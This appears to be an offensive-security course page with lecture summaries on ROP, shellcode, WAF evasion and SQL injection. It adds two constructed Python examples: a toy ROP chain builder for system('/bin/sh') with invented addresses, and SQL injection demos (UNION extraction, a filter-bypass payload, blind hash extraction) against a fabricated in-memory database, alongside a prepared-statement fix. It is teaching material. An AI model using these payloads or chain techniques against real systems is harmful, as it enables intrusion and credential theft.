In this lecture, our guest, Dr. Devin Cook, offers a brief overview of the history of modern binary exploitation. He covers everything from early buffer overflows and the first stack overflow mitigations to modern mitigations, modern bypass techniques, and Return Oriented Programming (ROP).
September 30, 2016
September 26, 2016
This lecture's first half covers new material: professional tips for Return Oriented Programming (ROP) gadget hunting, the analysis and design of advanced shellcode, and a walkthrough of a dynamic shellcode linker engine. The second half is a guest lecture by Dr. Devin Cook, demonstrating the ROP gadget finder, compiler, and chaining tool he uses as part of Samuri's Capture The Flag (CTF) team.
Midterm #2 covers lectures 09-20
Return Oriented Programming (ROP) is introduced and the modern history of exploit mitigations is revisited. Other *-oriented programming exploitation techniques, such as Jump Oriented Programming (JOP) and Call Oriented Programming (COP), are discussed at a high level. We walk through how to chain function calls together on the stack under various calling conventions (cdecl, fastcall, stdcall), and introduce the concept of gadgets. ROP gadget compilers are introduced briefly. Finally, the second half of the lecture presents a review of topics for MIDTERM 2.
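As an added example (not material from the lecture or from any tool it mentions), the following Python lays out one call chain, system("/bin/sh") followed by exit(0), on a 32-bit x86 stack under each of the three calling conventions named above. The chain builder is a toy version of what a ROP gadget compiler does, and a small simulator steps through the chain the way `ret` would, so the three layouts can be checked against each other. Every address, gadget and the string pointer are invented for the example; "fastcall" here means the Microsoft convention (first two arguments in ecx/edx, callee cleans any stack arguments), and calls with more than two fastcall arguments are deliberately not handled.

```python
"""Toy ROP chain builder and simulator for 32-bit x86 (constructed example).
All addresses are hypothetical; nothing here comes from a real binary."""
import struct

FUNCS = {"system": 0x08048420, "exit": 0x08048400}   # hypothetical PLT/libc addresses
ARITY = {"system": 1, "exit": 1}
FUNC_BY_ADDR = {addr: name for name, addr in FUNCS.items()}
BIN_SH = 0x0804A010           # hypothetical pointer to a "/bin/sh" string in the target
PLACEHOLDER = 0x41414141      # fills a return slot that is never used
GADGETS = {                   # hypothetical gadget addresses
    "pop1_ret": 0x08048511,         # pop ebx ; ret
    "pop2_ret": 0x08048522,         # pop ebx ; pop esi ; ret
    "pop_ecx_edx_ret": 0x08048533,  # pop ecx ; pop edx ; ret
}
GADGET_BY_ADDR = {addr: name for name, addr in GADGETS.items()}


def build_chain(calls, convention):
    """calls: [(func_name, [arg, ...]), ...]. Returns the chain as a list of dwords;
    chain[0] is the value that overwrites the saved return address."""
    if convention == "cdecl":
        # Caller cleans up: f returns into a pop-N gadget that discards f's own
        # args, and that gadget's ret lands on the next function.
        chain = [FUNCS[calls[0][0]]]
        for i, (func, args) in enumerate(calls):
            nxt = FUNCS[calls[i + 1][0]] if i + 1 < len(calls) else None
            if nxt is None:
                chain += [PLACEHOLDER] + list(args)      # last call never returns
            elif args:
                chain += [GADGETS["pop%d_ret" % len(args)]] + list(args) + [nxt]
            else:
                chain.append(nxt)
        return chain
    if convention == "stdcall":
        # Callee cleans up with `ret 4*n`: it pops the return slot and then discards
        # the args, so the return slot can hold the next function directly.
        chain = [FUNCS[calls[0][0]]]
        for i, (func, args) in enumerate(calls):
            nxt = FUNCS[calls[i + 1][0]] if i + 1 < len(calls) else PLACEHOLDER
            chain += [nxt] + list(args)
        return chain
    if convention == "fastcall":
        # First two args travel in ecx/edx, so each call is preceded by a gadget that
        # loads them; with no stack args the callee's plain ret lands on the next gadget.
        chain = []
        for func, args in calls:
            if len(args) > 2:
                raise NotImplementedError("stack args for fastcall not handled here")
            padded = list(args) + [PLACEHOLDER] * (2 - len(args))
            chain += [GADGETS["pop_ecx_edx_ret"], padded[0], padded[1], FUNCS[func]]
        return chain + [PLACEHOLDER]
    raise ValueError(convention)


def pack_chain(chain):
    """Little-endian dwords: the bytes that would follow the overflowed buffer."""
    return struct.pack("<%dI" % len(chain), *chain)


def simulate(chain, convention, max_steps=64):
    """Step through the chain as the CPU would and return the calls it performs."""
    stack, sp, regs, calls = list(chain), 0, {"ecx": 0, "edx": 0}, []

    def pop():
        nonlocal sp
        sp += 1
        return stack[sp - 1]

    eip = pop()                                    # the overwritten return address
    for _ in range(max_steps):
        if eip == PLACEHOLDER:
            return calls
        if eip in GADGET_BY_ADDR:
            name = GADGET_BY_ADDR[eip]
            if name == "pop_ecx_edx_ret":
                regs["ecx"], regs["edx"] = pop(), pop()
            else:
                for _ in range(int(name[3])):      # popN_ret: discard N dwords
                    pop()
            eip = pop()                            # the gadget's ret
        elif eip in FUNC_BY_ADDR:
            name = FUNC_BY_ADDR[eip]
            n = ARITY[name]
            if convention == "fastcall":
                args = [regs["ecx"], regs["edx"]][:n]
            else:
                args = stack[sp + 1:sp + 1 + n]    # args sit just above the return slot
            calls.append((name, args))
            eip = pop()                            # ret: the callee "returns" here
            if convention == "stdcall":
                sp += n                            # ret 4*n also discards the args
        else:
            raise ValueError("jumped to unknown address 0x%08x" % eip)
    raise RuntimeError("chain did not terminate")


CALLS = [("system", [BIN_SH]), ("exit", [0])]

if __name__ == "__main__":
    for conv in ("cdecl", "stdcall", "fastcall"):
        chain = build_chain(CALLS, conv)
        print(conv, [hex(d) for d in chain], simulate(chain, conv))
```

The point to take from the three layouts is where the argument cleanup lives: under cdecl the chain itself must supply a pop-N gadget between consecutive calls, under stdcall the callee's `ret 4*n` does that work so the return slot can name the next function directly, and under fastcall the arguments never touch the stack, so the gadget that loads ecx/edx comes before the call rather than after it.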
September 19, 2016
The first half of the lecture covers Web Application Firewalls (WAFs) and how they are often trivially bypassed. The second half covers, and walks through, the development of alphanumeric, polymorphic, connect-back shellcode payloads, techniques often used to evade WAFs, IDS, IPS, and other defenses. Connect-back shellcode development is discussed for Linux systems.
September 8, 2016
We cover the fragile ecosystem of the public key infrastructure (PKI) that supports Secure Sockets Layer (SSL) and Transport Layer Security (TLS): the internet certificate authorities. We cover the disturbing history of modern Certificate Authority (CA) failures and frequent compromises, and how rarely there is any consequence or improvement. Various attacks against SSL/TLS systems and certificate authorities are covered.
This lecture covers server-side attacks in depth, along with the OWASP Top 10. We cover broken authentication and session management, security misconfiguration, insecure direct object references, targeting admin and user functions with cross-site request forgery (CSRF) and similar missing function-level access control vulnerabilities, directory traversal, and finally SQL injection (SQLi). Metacharacter injection is revisited again, as it encompasses almost all of these techniques in practice and offers a straightforward model for approaching the diverse attack surface of web applications. SQLi is covered in depth, with several walkthroughs and techniques (in-band error-based, in-band UNION-based, second-order in-band injection, partial blind, fully blind, and more). We discuss SQLi discovery, database fingerprinting, filter or restriction enumeration, table mapping, and finally data extraction. Defenses such as prepared statements and output encoding are covered, along with several SQLi defense bypasses.
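As an added example (constructed for this page, not a walkthrough from the lecture), the following Python runs three of the techniques listed above against an in-memory SQLite database: in-band UNION-based extraction through a string-concatenated query, a blocklist "filter" of the kind that is bypassed with case changes and comment-based whitespace, and boolean-based (partial blind) inference one character at a time. The hardened lookup beside them uses a prepared statement with a bound parameter, which is what stops the same payloads from working. The schema, the rows and the fake password hash are all constructed for the example.

```python
"""SQL injection techniques beside the prepared-statement fix (constructed example).
Uses only the standard library; the database and its contents are made up."""
import sqlite3
import string


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, email TEXT);
        CREATE TABLE admins(username TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test'),
                                 (2, 'bob',   'bob@example.test');
        INSERT INTO admins VALUES ('root', '$2y$10$constructedhash');
    """)
    return con


def lookup_vulnerable(con, user_input):
    """The 'before' picture: untrusted input spliced straight into the query text."""
    sql = "SELECT name, email FROM users WHERE id = " + user_input
    return con.execute(sql).fetchall()


def lookup_filtered(con, user_input):
    """A blocklist 'defense': rejects spaces and the lowercase keyword, then runs
    the same vulnerable query.  SQL keywords are case-insensitive and /**/ counts
    as whitespace, so the filter is trivially bypassed."""
    if " " in user_input or "union" in user_input:
        raise ValueError("blocked by filter")
    return lookup_vulnerable(con, user_input)


def lookup_safe(con, user_input):
    """The fix: a prepared statement.  The input is bound as a value, never parsed
    as SQL, so a UNION payload is just a string that matches no integer id."""
    return con.execute("SELECT name, email FROM users WHERE id = ?", (user_input,)).fetchall()


# In-band UNION-based extraction: the admins table rides along in the users result set.
UNION_PAYLOAD = "1 UNION SELECT username, password_hash FROM admins"
# Same attack rewritten to slip past lookup_filtered (mixed case, comments for spaces).
BYPASS_PAYLOAD = "1/**/UnIoN/**/SeLeCt/**/username,password_hash/**/FROM/**/admins"


def blind_guess(con, position, char):
    """Boolean-based blind probe: the page only reveals whether the guess held
    (alice's row comes back) or not (empty result)."""
    probe = ("1 AND (SELECT substr(password_hash, %d, 1) FROM admins) = '%s'"
             % (position, char))
    return lookup_vulnerable(con, probe) != []


def extract_blind(con, length, alphabet=string.ascii_letters + string.digits + "$"):
    """Recover the first `length` characters of the hash one probe per guess."""
    recovered = ""
    for position in range(1, length + 1):
        for char in alphabet:
            if blind_guess(con, position, char):
                recovered += char
                break
        else:
            break                      # character not in alphabet; stop here
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal:   ", lookup_vulnerable(db, "1"))
    print("union:    ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("bypass:   ", lookup_filtered(db, BYPASS_PAYLOAD))
    print("blind:    ", extract_blind(db, 4))
    print("prepared: ", lookup_safe(db, UNION_PAYLOAD))
```

Note that the parameterized version does not "sanitize" anything; it changes where the boundary between code and data is drawn, so the whole payload arrives at the engine as one value. That is also why the blocklist fails even in principle: it is trying to recognize SQL inside a string whose grammar it does not parse.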
September 2, 2016
We cover the internals of most modern web browsers and web server architectures to present a deep overview of the massive attack surface associated with web applications and web browsing. The big picture is revisited and we discuss how modern binary exploitation techniques still heavily apply to each attack vector. Then we examine the growing security problem of indirect/background queries and the sharp rise of malicious third-party content and advertisements.
This lecture covers Secure Shell (SSH), Secure Sockets Layer (SSL), IPsec, port scanning, and port-binding networking shellcode. We inspect the design and development of polymorphic port-binding shellcode for Linux systems.
This lecture covers an overview of networking concepts and network security concepts. Topics covered include Wireshark, nmap, nc, hubs vs. switches vs. routers, manufacturer default logins and backdoors, ARP and DNS (including DNSSEC), proxies, and the weak vs. strong host model for IP (RFC 1122).